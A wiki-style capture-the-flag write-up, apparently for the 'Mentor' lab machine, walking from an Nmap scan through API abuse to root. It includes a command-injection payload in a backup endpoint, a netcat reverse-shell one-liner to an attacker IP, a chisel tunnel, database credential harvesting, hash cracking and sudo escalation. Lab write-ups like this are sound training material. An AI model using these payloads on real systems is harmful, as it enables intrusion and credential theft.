Mentor

From RCATs
Revision as of 19:43, 20 January 2023 by SourMilk (talk | contribs)

Start with Nmap scan with default scripts a version enumeration

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST
Nmap scan report for 10.129.85.230                                                                                                                             
Host is up (0.085s latency).                                                                                                                                   
Not shown: 998 closed tcp ports (conn-refused)                                                                                                                 
PORT   STATE SERVICE VERSION                                                                                                                                   
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)                                                                                       
| ssh-hostkey:                                                                                                                                                 
|   256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)                                                                                                               
|_  256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)                                                                                                             
80/tcp open  http    Apache httpd 2.4.52                                                                                                                       
|_http-title: Did not follow redirect to http://mentorquotes.htb/                                                                                              
|_http-server-header: Apache/2.4.52 (Ubuntu)                                                                                                                   
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                                

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                 
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds

Main webpage does not have much to look at. Lets scan subdomains. Vhost/subdomain scan gets us api.mentorquotes.htb Scan see if we get anything else api.mentorquotes.htb

 :: Method           : GET                                                                                             │
 :: URL              : http://api.mentorquotes.htb/FUZZ                                                                │
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt                     │
 :: Follow redirects : false                                                                                           │
 :: Calibration      : false                                                                                           │
 :: Timeout          : 10                                                                                              │
 :: Threads          : 40                                                                                              │
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500                                            │
________________________________________________                                                                       │
                                                                                                                       │
admin                   [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 98ms]                                     │
docs                    [Status: 200, Size: 969, Words: 194, Lines: 31, Duration: 71ms]                                │
users                   [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 79ms]                                     │
quotes                  [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms]                                     │
server-status           [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms]                                 │
:: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 ::

We get a Status 200 from docs lets check that out. We see a potenial user James We also see various GET, POST, PUT, DELETE options. Try to create user. WORKS!

{
  "email": "sour@sourmilk.com",
  "username": "sourmilk",
  "password": "password123456"
}
# Response

{
  "id": 5,
  "email": "sour@sourmilk.com",
  "username": "sourmilk"
}

Create james account since we know he is an admin.

{
  "email": "james@sourmilk.com",
  "username": "james",
  "password": "password123456"
}

# Response

{
  "id": 6,
  "email": "james@sourmilk.com",
  "username": "james"
}

/auth/login to get a token

{
  "email": "james@sourmilk.com",
  "username": "james",
  "password": "password123456"
}
# response
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"

curl /admin with token to get a response.

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/

# Response
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}

check /admin/check

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/check

# Reponse
{"details":"Not implemented yet!"}

Check /admin/backup/

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup

# Response
{"detail":"Method Not Allowed"}
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}

Make a test payload to see if we can do anything. Works!

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://10.10.16.11`"}'

Reverse Shell

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.11 4444 >/tmp/f`"}'

Dig around the docker you are in.

/app # ls
Dockerfile
app
requirements.txt
/app # ls -al
total 32
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 .
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 ..
-rw-r--r--    1 root     root          1024 Jun 12 10:21 .Dockerfile.swp
-rw-r--r--    1 root     root           522 Nov  3 12:58 Dockerfile
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 app
-rw-r--r--    1 root     root           672 Jun  4  2022 requirements.txt
/app # cd app
/app/app # ls -al
total 40
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 .
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 ..
-rw-r--r--    1 root     root             0 Jun  4  2022 __init__.py
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 __pycache__
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 api
-rw-r--r--    1 root     root             0 Jun  4  2022 config.py
-rw-r--r--    1 root     root          1001 Jun  7  2022 db.py
-rw-r--r--    1 root     root          1149 Jun  4  2022 main.py
-rw-r--r--    1 root     root           704 Jun  4  2022 requirements.txt

cat db.py

import os

from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database

# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

# SQLAlchemy for quotes
engine = create_engine(DATABASE_URL)
metadata = MetaData()
quotes = Table(
    "quotes",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("title", String(50)),
    Column("description", String(50)),
    Column("created_date", DateTime, default=func.now(), nullable=False)
)

# SQLAlchemy for users
engine = create_engine(DATABASE_URL)
metadata = MetaData()
users = Table(
    "users",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("email", String(50)),
    Column("username", String(50)),
    Column("password", String(128) ,nullable=False)
)


# Databases query builder
database = Database(DATABASE_URL)

Hacktricks Port Fowarding Good read about chisel

# My machine
./chisel server -p 4443 --reverse

# Victim machine
wget http://10.10.16.11/chisel
chmod +x chisel
./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432

Now we can try to log into the bd we found

psql -h 127.0.0.1 -U "postgres" -p 5432
Password for user postgres:
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
Type "help" for help.

postgres=# \list
                                    List of databases
      Name       |  Owner   | Encoding |  Collate   |   Ctype    |   Access privileges   
-----------------+----------+----------+------------+------------+-----------------------
 mentorquotes_db | postgres | UTF8     | en_US.utf8 | en_US.utf8 |
 postgres        | postgres | UTF8     | en_US.utf8 | en_US.utf8 |
 template0       | postgres | UTF8     | en_US.utf8 | en_US.utf8 | =c/postgres          +
                 |          |          |            |            | postgres=CTc/postgres
 template1       | postgres | UTF8     | en_US.utf8 | en_US.utf8 | =c/postgres          +
                 |          |          |            |            | postgres=CTc/postgres
(4 rows)

postgres=# \c mentorquotes_db
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
You are now connected to database "mentorquotes_db" as user "postgres".
mentorquotes_db=# \d
              List of relations
 Schema |     Name      |   Type   |  Owner   
--------+---------------+----------+----------
 public | cmd_exec      | table    | postgres
 public | quotes        | table    | postgres
 public | quotes_id_seq | sequence | postgres
 public | users         | table    | postgres
 public | users_id_seq  | sequence | postgres
(5 rows)

mentorquotes_db=# select * from users;
 id |          email          |  username   |             password             
----+-------------------------+-------------+----------------------------------
  1 | james@mentorquotes.htb  | james       | -----------------------------
  2 | svc@mentorquotes.htb    | service_acc | --------------------------
  4 | james@sourmilk.com      | james       | -------------------
(3 rows)

Grab svc hash and crackstaion has a hit!

123meuno***********

SSH into box

❯ ssh svc@mentorquotes.htb
svc@mentorquotes.htb's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Dec 12 05:21:51 PM UTC 2022

  System load:                      0.08740234375
  Usage of /:                       64.9% of 8.09GB
  Memory usage:                     14%
  Swap usage:                       0%
  Processes:                        237
  Users logged in:                  0
  IPv4 address for br-028c7a43f929: 172.20.0.1
  IPv4 address for br-24ddaa1f3b47: 172.19.0.1
  IPv4 address for br-3d63c18e314d: 172.21.0.1
  IPv4 address for br-7d5c72654da7: 172.22.0.1
  IPv4 address for br-a8a89c3bf6ff: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.129.85.242
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:4e9f


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11
svc@mentor:~$

Search for passwords in config files. grep -iR password /etc 2>/dev/null | grep ".conf"

svc@mentor:/tmp$ grep -iR password /etc 2>/dev/null | grep ".conf"
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for initiator
/etc/iscsi/iscsid.conf:#node.session.auth.password = password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#node.session.auth.password_in = password_in
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for the initiator
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password = password
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password_in = password_in
/etc/ssh/ssh_config:#   PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitRootLogin prohibit-password
/etc/ssh/sshd_config:# To disable tunneled clear text passwords, change to no here!
/etc/ssh/sshd_config:#PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitEmptyPasswords no
/etc/ssh/sshd_config:# Change to yes to enable challenge-response passwords (beware issues with
/etc/ssh/sshd_config:# PasswordAuthentication.  Depending on your PAM configuration,
/etc/ssh/sshd_config:# the setting of "PermitRootLogin without-password".
/etc/ssh/sshd_config:# PAM authentication, then enable this but set PasswordAuthentication
/etc/ssh/sshd_config:PasswordAuthentication yes
/etc/apache2/sites-available/default-ssl.conf:          #        Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf:          #        file needs this password: `xxj31ZMTZzkVA'.
/etc/sos/sos.conf:#password = true
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES
/etc/overlayroot.conf:#       if not provided or empty, password is randomly generated
/etc/overlayroot.conf:#       the generated password will be stored for recovery in
/etc/overlayroot.conf:#     crypt:dev=/dev/vdb,pass=somepassword,mkfs=0
/etc/overlayroot.conf:#      $ MAPNAME="secure"; DEV="/dev/vdg"; PASSWORD="foobar"
/etc/overlayroot.conf:#      $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:#      $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:#    IT IS INSECURE TO SET THIS PASSWORD HERE IN THIS CLEARTEXT CONFIGURATION
/etc/overlayroot.conf:#    Randomly generated passwords are more secure, but you won't be able to
/etc/overlayroot.conf:#    Randomly generated passwords are generated by calculating the sha512sum
/etc/fwupd/remotes.d/lvfs-testing.conf:#Password=
/etc/fwupd/redfish.conf:# The username and password to the Redfish service
/etc/fwupd/redfish.conf:#Password=
/etc/sudo.conf:# password prompt for "sudo -A" support.  Sudo does not ship with its
/etc/apparmor.d/abstractions/authentication:  # databases containing passwords, PAM configuration files, PAM libraries

Winner Winner

/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES

Super user james and get your flag!

james@mentor:/tmp$ su james
Password:
james@mentor:/tmp$ sudo /bin/sh
[sudo] password for james:
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
logins.log  root.txt  scripts  snap
# cat root.txt